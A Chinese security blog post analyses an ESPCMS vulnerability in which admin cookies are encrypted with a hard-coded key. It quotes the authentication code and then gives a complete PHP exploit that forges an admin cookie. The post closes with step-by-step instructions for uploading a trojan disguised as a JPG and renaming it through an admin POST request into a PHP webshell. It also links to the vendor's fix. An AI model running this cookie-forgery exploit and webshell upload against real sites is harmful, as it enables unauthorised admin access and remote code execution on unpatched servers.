当前位置: iick's blog > 网站漏洞 > ESPCMS 0day漏洞分析及官方修复方法

ESPCMS 0day漏洞分析及官方修复方法

作者:hack1990 时间:11-01-19 阅读数:460人阅读

发布日期:2011-01.17
发布作者:★黑小子★

影响版本:未知
官方网站:http://www.ecisp.cn

漏洞类型:COOKIES欺骗
漏洞描述:取得COOKIES后修改欺骗,进入后台上传jpg构造Getshell。

代码分析:

function softbase($admin_purview=false) {

 

header("Content-Type: text/html; charset=utf-8");

$this->dbmysql();

$this->commandinc();

$this->systemfile();

$this->cachedb();

if ($admin_purview) {

$this->admin_purview();

}

 

admin_purview 是检测登录状态的

再看

 

function admin_purview() {

if ($this->fun->accept('archive', 'R') == 'filemanage' && $this->fun->accept('action', 'R') == 'batupfilesave') {

 

$ecisp_admininfo = $this->fun->accept('ecisp_admininfo', 'G');

$esp_powerlist = $this->fun->accept('esp_powerlist', 'G');

$gettype = false;

} else {

$ecisp_admininfo = $this->fun->accept('ecisp_admininfo', 'C');

$esp_powerlist = $this->fun->accept('esp_powerlist', 'C');

$gettype = true;

}

 

$arr_purview = explode('|', $this->fun->eccode($ecisp_admininfo, 'DECODE')); // 其他都没什么用 这里才是重点 by Black Boy

 

$this->esp_powerlist = explode('|', $this->fun->eccode($esp_powerlist, 'DECODE'));

 

list($this->esp_adminuserid, $this->esp_username, $this->esp_password, $this->esp_useragent, $this->esp_powerid, $this->esp_inputclassid, $this->esp_softurl) = $arr_purview;

if ($gettype) {

if (empty($this->esp_username) || empty($this->esp_adminuserid) || md5(admin_AGENT) != $this->esp_useragent || md5(admin_ClassURL) != $this->esp_softurl) //检测是否有这些东西 有就跳过检测 没有就返回登录页面 下面意思简单 不解析了{Black Boy
复制代码

$condition = 0;

} else {

$condition = 1;

}

} else {

if (empty($this->esp_username) || empty($this->esp_adminuserid) || md5(admin_ClassURL) != $this->esp_softurl) {

$condition = 0;

} else {

$condition = 1;

}

}

if ($condition == 0) {

 

if ($this->fun->accept('archive', 'R') != 'adminuser' && $this->fun->accept('action', 'R') != 'login') {

header('location: index.php?archive=adminuser&action=login');

exit();

}

} else {

 

if ($condition == 1 && $this->fun->accept('point', 'R') == '' && $this->fun->accept('archive', 'R') == '' && $this->fun->accept('action', 'R') == '') {

header('location: index.php?archive=management&action=tab&loadfun=mangercenter');

exit();

}

}

}

 

那么 现在最重点的就是 eccode 这个加密方式了

看代码

 

 

function eccode($string, $operation='DECODE', $key='@LFK24s224%@safS3s%1f%') {

$result = '';

if ($operation == 'ENCODE') {

for ($i = 0; $i < strlen($string); $i++) {

$char = substr($string, $i, 1);

$keychar = substr($key, ($i % strlen($key)) - 1, 1);

$char = chr(ord($char) + ord($keychar));

$result.=$char;

}

$result = base64_encode($result);

$result = str_replace(array('+', '/', '='), array('-', '_', ''), $result);

} elseif ($operation == 'DECODE') {

$data = str_replace(array('-', '_'), array('+', '/'), $string);

$mod4 = strlen($data) % 4;

if ($mod4) {

$data .= substr('====', $mod4);

}

$string = base64_decode($data);

for ($i = 0; $i < strlen($string); $i++) {

$char = substr($string, $i, 1);

$keychar = substr($key, ($i % strlen($key)) - 1, 1);

$char = chr(ord($char) - ord($keychar));

$result.=$char;

}

}

return $result;

 

很明显 解密都不用写了 反过来行了 一个一个加密过程解析出来很辛苦的

核心漏洞就是 $key='@LFK24s224%@safS3s%1f%'

不是随机生成


复制代码

 

 

EXP:    <?  function eccode($string, $operation='DECODE', $key='@LFK24s224%@safS3s%1f%') {   $result = '';   if ($operation == 'ENCODE') {   for ($i = 0; $i < strlen($string); $i++) {   $char = substr($string, $i, 1);   $keychar = substr($key, ($i % strlen($key)) - 1, 1);   $char = chr(ord($char) + ord($keychar));   $result.=$char;   }   $result = base64_encode($result);   $result = str_replace(array('+', '/', '='), array('-', '_', ''), $result);   } elseif ($operation == 'DECODE') {   $data = str_replace(array('-', '_'), array('+', '/'), $string);   $mod4 = strlen($data) % 4;   if ($mod4) {   $data .= substr('====', $mod4);   }   $string = base64_decode($data);   for ($i = 0; $i < strlen($string); $i++) {   $char = substr($string, $i, 1);   $keychar = substr($key, ($i % strlen($key)) - 1, 1);   $char = chr(ord($char) - ord($keychar));   $result.=$char;   }   }   return $result;   }   define('admin_AGENT', $_SERVER['HTTP_USER_AGENT']);   $name=$_POST[name];   $s=md5(admin_AGENT);   $ecisp_admininfo='1|admin|e00cf25ad42683b3df678c61f42c6bda|'.$s.'|1|1|'.md5("http://".$name."/adminsoft");   $a= eccode($ecisp_admininfo, 'ENCODE');   echo "ecisp_admininfo=".$a.";esp_powerlist=hqy4;"."<br><br><br>";   ?>   <form method="post" action="http://www.hackersb.com/sb/test.php" enctype="multipart/form-data" id="upload">  <label>  <input name="name" type="text" value="www.t00ls.net" /> by:Black Boy http://www.hackersb.com/   </label>  <div></div>  <input name="respondids" value="给我COOKIES " class="coolbg np" type="submit">  </form>  http://www.hackersb.com/sb/test.php 为本文件地址
复制代码http://www.hackersb.com/sb/test.php 为本文件地址

注 : $s 为当前浏览器版本 你用什么浏览器去运行这个程序的 就用这个浏览器去欺骗

得出COOKIES后修改欺骗 进入后台

然后内容添加 上传文件 把马儿改成JPG上传
最后 POST :

/adminsoft/index.php?archive=filemanage&action=renamesave

path=/upfile/&dirname=product.jpg&newdirnam=1.php

product.jpg为上传后的JPG木马文件

最后webshell就在 upfile/1.php

官方已经出修复方案:http://www.ecisp.cn/html/cn/aboutus/news/124.html

上一篇:联想搜索跨站漏洞及修复

下一篇:安徽四人购买黑客软件攻击政府网站获刑

相关文章

发表评论